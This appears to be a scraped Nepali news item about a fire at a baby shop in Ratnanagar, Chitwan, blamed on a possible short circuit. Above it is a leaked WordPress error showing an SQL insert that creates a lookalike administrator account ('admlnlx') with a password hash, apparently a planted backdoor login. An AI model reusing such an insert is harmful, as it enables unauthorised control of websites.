WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BG4CFmUQJBiNihdGTQkEv2DL4Wv3xY/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-24 20:30:09', '', 'admlnlx', 'admlnlx')
चितवन, माघ १८–
पूर्वी चितवनको रत्ननगरस्थित गंगा प्लाजामा रहेको सम्पूर्ण बेबी सपमा भीषण आगलागि भएको छ । राती भरतपुरबाट गएको दमकल, प्रहरी र स्थानीयबासीले आगोलाई नियन्त्रणमा लिएको छ । विद्युत् सर्ट भई आगलागि भएको हुन सक्ने प्रहरीले अनुमान गरेको छ । सो पसल टंकप्रसादको लामिछानेको रहेको प्रहरीले जनाएको छ । क्षतिको पूर्ण विवरण आउन बाँकी छ ।